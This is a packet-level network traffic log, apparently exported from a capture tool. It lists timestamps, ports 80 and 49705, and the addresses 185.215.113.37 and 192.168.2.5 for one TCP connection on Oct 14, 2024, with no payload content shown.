Oct 14, 2024 01:53:14.885129929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885154009 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885157108 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885157108 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885164976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885181904 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885200977 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885204077 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885235071 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885246992 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885251045 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885271072 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885277033 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885288954 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885293007 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885315895 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885318041 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885334015 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885337114 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885344028 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885374069 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885396957 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885399103 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885411024 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885442972 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885478020 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885571003 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885615110 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885725975 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885735989 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885745049 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885754108 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885762930 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885770082 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885772943 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885783911 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885792971 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885793924 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885804892 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885812998 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885814905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885826111 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.885833979 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885854006 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.885885000 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.888573885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.888583899 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.888592958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.888624907 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.888633966 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.888643980 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.888653994 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.888658047 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.888658047 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.888674021 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.888685942 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.888714075 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.888715029 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.932575941 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.932641029 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.932677031 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.932677984 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.932710886 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.932746887 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.932746887 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.932764053 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.932776928 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.932797909 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.932818890 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.932832003 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.932846069 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.932883024 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.934535980 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.934602022 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.934662104 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.934693098 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.934721947 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.934726000 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.934746027 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.934778929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.934796095 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.934813023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.934823036 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.934865952 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.934866905 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.934900999 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.934921026 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.934935093 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.934953928 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.934978962 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.934987068 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935020924 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935038090 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935053110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935077906 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935087919 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935097933 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935133934 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935137033 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935189009 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935205936 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935237885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935261965 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935281992 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935288906 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935338974 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935343981 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935378075 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935415983 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935442924 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935492039 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935499907 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935499907 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935524940 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935544014 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935560942 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935586929 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935592890 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935619116 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935627937 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935659885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935663939 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935686111 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935693979 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935710907 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935728073 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935745955 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935761929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935770988 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935794115 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935811996 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935827971 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935842991 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935863018 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935880899 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935897112 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935924053 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935942888 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.935949087 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.935981989 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936012983 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936013937 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936037064 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936052084 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936063051 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936085939 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936100960 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936120033 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936140060 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936151028 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936162949 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936183929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936199903 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936218023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936237097 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936250925 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936259985 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936285019 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936299086 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936317921 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936331987 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936352015 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936371088 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936384916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936394930 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936419010 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936435938 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936453104 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936465979 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936489105 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936503887 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936523914 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936537981 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936557055 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936574936 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936589956 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936605930 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936623096 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936635971 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936656952 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936671019 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936691046 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936708927 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936723948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936728954 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936758041 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936774015 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936791897 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936799049 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936825037 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936841011 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936860085 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936873913 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936889887 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936907053 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936923027 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936938047 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936959982 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.936976910 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.936990023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.937007904 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.937047005 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975210905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975244999 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975280046 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975284100 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975308895 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975312948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975330114 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975349903 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975363970 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975425005 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975459099 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975493908 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975526094 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975547075 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975547075 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975568056 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975610018 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975641966 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975681067 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975703001 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975712061 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975744963 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975761890 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975779057 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975792885 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975811958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975826979 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975845098 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975868940 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975878954 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.975891113 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.975945950 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976102114 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976150036 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976160049 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976198912 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976200104 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976233006 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976243019 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976267099 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976281881 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976306915 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976317883 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976351976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976376057 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976382971 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976398945 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976417065 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976429939 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976450920 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976468086 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976485968 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976504087 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976517916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976537943 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976552963 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976562023 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976587057 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976603031 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976620913 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976634026 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976672888 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976682901 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976706028 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976720095 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976739883 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976756096 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976773977 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976789951 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976807117 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976824045 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976840973 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976855993 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976875067 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.976892948 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.976921082 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.979039907 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.979073048 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.979098082 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.979120970 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.979124069 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.979157925 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.979173899 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.979192019 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.979212046 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.979223967 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.979235888 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.979258060 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.979268074 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:14.979307890 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.023027897 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.023086071 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.023108959 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.023121119 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.023133993 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.023154020 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.023174047 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.023189068 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.023212910 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.023221970 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.023236036 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.023256063 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.023276091 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.023288965 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.023303032 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.023355961 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025258064 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025291920 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025319099 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025345087 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025346041 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025377989 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025394917 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025419950 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025432110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025464058 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025484085 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025496960 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025509119 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025548935 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025552034 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025583029 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025603056 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025616884 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025630951 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025669098 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025669098 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025702000 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025718927 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:15.025754929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:15.025787115 CEST	80	49705	185.215.113.37	192.168.2.5
